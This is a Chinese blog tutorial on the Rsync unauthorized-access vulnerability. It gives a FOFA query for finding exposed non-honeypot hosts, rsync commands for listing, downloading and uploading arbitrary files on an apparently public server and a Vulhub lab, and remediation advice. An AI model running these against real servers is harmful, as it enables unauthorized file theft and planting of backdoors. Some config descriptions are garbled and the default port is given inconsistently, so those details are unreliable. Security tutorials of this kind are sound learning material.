Rsync未授权访问漏洞 *

于 2024-08-05 18:57:21 发布
阅读量172 收藏 1
点赞数 1
分类专栏: 未授权访问漏洞 文章标签: 18 Rsync未授权访问漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63988455/article/details/140927491
版权

Rsync是Linux/Unix下的一个远程数据同步工具,可通过LAN/WAN快速同步多台主机间的文件和目录,默认运行在873端口。由于配置不当,导致任何人可未授权访问rsync,上传本地文件,下载服务器文件。Rsync 默认允许匿名访问,如果在配置文件中没有相关的用户认证以及文件授权,就会触发隐患。Rsync 的默认端口为 837且默认配置文件路径在/etc/rsync.conf

fofa:(port="873") && (is_honeypot=false && is_fraud=false)

# 配置文件
motd file -> motd文件位置
log file -> 日志文件位置文件位置
path -> 默认路径位置路径位置
use chroot -> 是否限定在该目录下定在该目录下该目录下,如果为true就限定为模块默认目录
read only -> 只读配置
list=true -> 是否可以列出模块名以列出模块名出模块名
uid = root -> 传输使用的用户名
gid = root -> 传输使用的用户组
auth users -> 认证用户名
secrets file=/etc/rsyncd.passwd -> 指定密码文件密码文件,密码文件/etc/rsyncd.passwd的内容格式为:username:password
hosts allow=192.168.0.101  -> 设置可以允许访问的主机
hosts deny 禁止的主机*表任意任意

# 基本命令
Rsync [-avrlptgoD] [-e ssh] [user@hostIP:/dir] [/local/path]

-v 观察模式,输出更多资讯
-q 与 –v 相反,仅显示错误信息
-r 递归复制,针对目录
-u 仅更新较新的文件
-l 复制连接的属性
-p 复制时保持属性不变
-g 保存原有群组
-o 保存原有拥有人
-D 保存原有装置属性
-t 保存原有时间属性
-I 忽略更新时间属性,档案比对较快
-z 加上压缩参数
-e 使用协议通道,例如ssh,-e ssh
-a 相对于-rlptgoD,所以-a最常用

》》》漏洞描述《《《

Rsync未授权访问带来的危害主要有两个:

  1. 造成了严重的信息泄露;
  2. 上传脚本后门文件,远程命令执行;

》》》漏洞复现《《《

步骤一:在fofa中搜索该资产语法如下并在Vulhub中开启靶场!!!

# Fofa语法
(port="873") && (is_honeypot=false && is_fraud=false)
# 启动靶场
cd vulhub/rsync/common
docker-compose up -d
列出目标服务器的同步目录:

	rsync x.x.x.x::
		
rsync rsync://45.125.0.38:873

列出模块下文件

rsync rsync://45.125.0.38:873/debiancn

下载任意文件
	rsync rsync://45.125.0.38:873/debiancn/a.txz /home/kali/Desktop/a.txz

上传任意文件
	rsync x.txt rsync://192.168.0.185/src/home/
	rsync x.txt 192.168.0.185::src/home/

》》》漏洞修复《《《

# 通用解决
配置认证用户名或者密码
host allow/deny 来控制接入源IP
uid和gid,使用足够但最小权限的账号进行
必要时候可以配置只读
非必要应该仅限制配置路径下可访问

# 解决细节
1.修改指定端口
- 配置文件不存在修改指定端口的选项,可以在启动命令行通过参数指定
/usr/local/rsync/bin.rsync --port=878 --daemon
- 查看进程检测是否更改端口
ps -ef | grep rsync
2.禁止匿名访问
- 配置文件/etc/rsync.conf中增加 auth users = test
- 若未包含auth users即为匿名访问
starhei.zxy
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
rsync 授权访问漏洞
weixin_59086772的博客
12-28 7409
雨笋教育小编来分享干货了,感兴趣的可以一同探讨。 0x00前言 rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。 0x01漏洞原理 rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件。 0x02漏洞危害 rsync授权访问会造成严重的信息泄露,攻击者可以上传脚本后门文件,远程命令执行。 0x03环境搭建 docker-compose.yml version: '2' s
每日漏洞 | rsync授权访问
03-12 3829
每日漏洞 | rsync授权访问
授权访问Rsync 授权访问漏洞
qq_68163788的博客
05-16 754
Rsync(remote synchronize)是一个远程数据同步工具,可通过 LAN/WAN 快速同步多台主机间的文件,也可以同步本地硬盘中的不同目录。 Rsync 默认允许匿名访问,如果在配置文件中没有相关的用户认证以及文件授权,就会触发隐患。Rsync 的默认端口为 837。
rsync授权访问漏洞
Kevin's Blog
08-06 3195
文章目录一、漏洞介绍二、漏洞环境三、漏洞利用3.1 漏洞探测3.2 漏洞利用(下载任意文件)3.3 漏洞利用(提权、反弹shell)四、修复建议 一、漏洞介绍 二、漏洞环境 三、漏洞利用 3.1 漏洞探测 》》nmap扫描对方是否存在rsync服务,默认端口873,可能更改成了其它端口 》》列出目标服务器目录:(两个方法皆可) 》》查看目录中的文件,如能查看说明存在授权访问漏洞 或者 rsync rsync://<ip>:<port>/src 3.2 漏洞利用(下载任意文件
rsync授权访问漏洞利用
weixin_47493074的博客
10-05 761
rsync授权访问漏洞利用
复现vulhub中rsync授权访问漏洞
YX_zjp的博客
05-08 504
rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件。
rsync授权漏洞复现
weixin_45006525的博客
03-31 5765
漏洞简介: rsync是linux系统下的数据镜像备份工具,使用rsync可以快速增量备份数据,支持本地复制,或与其他ssh、rsync主机同步。该协议默认监听873端口,如果目标开启rsync,并且没有配置ACL或访问密码,就可以授权读写目标服务器文件。 环境搭建: 本此环境使用docker-vulhub 进入vulhub-rsync,运行docker-compose up -d 环境搭建完成后,用nmap扫描一下,发现服务已经启动 漏洞复现 1.列出模块下的文件 2.下载任意文件 rsync r
rsync授权访问漏洞利用复现
技术超强的网络安全平台
05-07 1191
一、Rsync简介Rsync是Linux下一款数据备份工具,它在同步文件的同时,可以保持原来文件的权限、时间、软硬链接等附加信息。同时支持通过rsync协议、ssh协议进行远程文件传输。常被用于在内网进行源代码的分发及同步更新,因此使用人群多为开发人员。其中rsync协议默认监听873端口,而一般开发人员安全意识薄弱的情况下,如果目标开启了rsync服务,并且没有配置ACL或访问密码,而rsync默认是root权限,我们将可以读写目标服务器文件。二、利用条件rsync默认允许匿名访问,也可在其配置文件中为同
linux rsync 漏洞修复,rsync授权访问漏洞利用
weixin_35545345的博客
05-16 398
漏洞描述:rsync是Linux系统下的数据镜像备份工具,使用快速增量备份工具Remote Sync可以远程同步,支持本地复制,或者与其他ssh,rsync主机同步。漏洞利用:它的默认端口号是873,我们可以使用nmap扫描端口看目标IP是否开启了873端口防御方法:配置认证用户或者密码;host allow/deny 来控制接入源IP;uid和gid,使用足够但最小权限的账号进行;必要时候可以配...
Rsync Vault Manager-开源
05-02
这使得敏感信息的备份更为可靠,防止授权访问。 4. **版本控制**:通过 rvm,用户可以保留文件的不同版本,从而实现某种程度的历史版本恢复。这对于追踪文件变化和错误修复非常有帮助。 5. **计划任务**:...
2022年护网行动漏洞
06-08
这些OA系统的漏洞可能允许授权的数据访问或操作。 #### 五、设备漏洞 文档中列举了多个品牌和型号的设备,如Windows系统、Linux系统、Jenkins、Microsoft Exchange Server等。这些设备和服务的安全漏洞涵盖了...
2022年HW前沿漏洞利用库.pdf
06-30
这些漏洞可能会导致服务崩溃、数据泄露和授权访问等问题。 中间件漏洞部分涵盖了Apache Struts2、Weblogic、Jboss、Tomcat、ElasticSearch、Apache家族、Fastjson和WSO2等多个中间件的漏洞。这些漏洞可能会...
CTF之信息泄漏.pdf
02-11
#### 五、授权访问漏洞 **漏洞成因**:许多服务在默认安装时并启用身份验证机制。如果服务暴露在互联网上,且进行适当的身份验证配置,那么任何人都可以访问这些服务并执行恶意操作。 **常见授权访问的服务...
远程同步Linux平台数据.pdf
09-06
使用SSH作为Rsync的传输层协议可以提高安全性,但为了防止授权访问,还需要在防火墙中设置规则,只允许特定IP地址或范围的客户端进行连接。此外,定期更新Rsync及其依赖的SSH版本,能有效抵御已知的安全漏洞。 ##...
新闻阅读器.rar
08-04
小程序的设计源码通常包含多个文件和文件夹,组织结构清晰,以便开发者能够快速上手并进行定制化开发。主要文件和文件夹包括: 页面文件夹:存放小程序的各个页面,每个页面通常由.wxml、.wxss、.js和.json文件组成。WXML文件负责页面的结构,类似于HTML;WXSS文件负责样式,类似于CSS;JS文件负责页面的逻辑和交互;JSON文件用于页面的配置,如导航栏标题等。 组件文件夹:存放可复用的UI组件。组件与页面类似,也由.wxml、.wxss、.js和.json文件组成。通过组件化设计,可以提高代码的复用性和维护性,减少重复工作。 静态资源文件夹:存放图片、音频、视频等静态资源,便于在小程序中引用。这些资源通常放在一个名为assets或static的文件夹中。 配置文件:小程序的根目录下通常有一个app.json文件,用于全局配置,如页面路径、导航栏样式、底部Tab栏等。此外,还有app.wxss和app.js文件,分别用于全局样式和全局逻辑。 工具文件夹:存放一些工具函数和库文件,便于在小程序中调用。这些文件通常放在一个名为utils的文件夹中。
Windows Server 2008R2 sp1 升级 Service Pack 1
08-04
windows Server 2008 R2 Standard 升级 Service Pack 1 《Windows Server 2008 R2 SP1与IE11及依赖包详解》 Windows Server 2008 R2 SP1(Service Pack 1)是微软公司针对其服务器操作系统Windows Server 2008 R2的一个重要更新,旨在增强系统性能、提升安全性,并修复了大量已知问题。SP1的引入,不仅包含了自Windows Server 2008 R2发布以来的所有累积更新,还提供了对新技术的支持,例如Hyper-V 3.0虚拟化技术,提高了云计算和数据中心的管理效率。 IE11(Internet Explorer 11)是微软推出的最后一个版本的传统IE浏览器,对于Windows Server 2008 R2 SP1来说,这是一个重要的升级。IE11带来了更快的网页加载速度、更好的标准支持以及增强的安全特性。它支持HTML5、CSS3等现代Web技术,提供了更好的用户体验,并且增强了对企业级应用的兼容性。
基于python的crazy管理系统 (5).zip
最新发布
08-04
安装包
ThinkPHP高仿蓝奏云网盘系统源码/对接易支付系统程序
08-04
基于ThinkPHP开发的高仿蓝奏云网盘系统源码,对接易支付系统,此网盘可以做网赚网盘,有VIP功能支持对接易支付,后台自行配置。 搭建教程: 1、修改数据库config/database.php 2、导入打包的数据库文件 3、设置为pcblic运行目录 4、设置伪静态规则为 thinkphp 5、上面全部设置好了就可以后台登入地址:域名/admin.php
rsync 漏洞利用
08-15
回答: 目前已经存在一些rsync漏洞,可以被攻击者利用来执行远程代码或者获取敏感信息。其中一种漏洞是在rsync服务端配置文件中,如果配置了"uid"和"gid"为root权限,并且没有启用chroot限制,则攻击者可以通过构造恶意的rsync请求来提升权限并执行恶意代码。此外,在一些版本的rsync中存在其他漏洞,攻击者可以利用这些漏洞来执行任意命令或者读取敏感文件。要防止漏洞利用,建议及时更新rsync到最新版本,并且配置合适的权限限制和访问控制,确保只有合法的用户可以访问rsync服务。另外,也应该定期审查rsync日志,以及监控系统中的异常行为。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [rsync 授权访问漏洞](https://blog.csdn.net/weixin_59086772/article/details/122195357)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *3* [漏洞利用——Rsync匿名访问漏洞](https://blog.csdn.net/qq_33608000/article/details/104124375)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值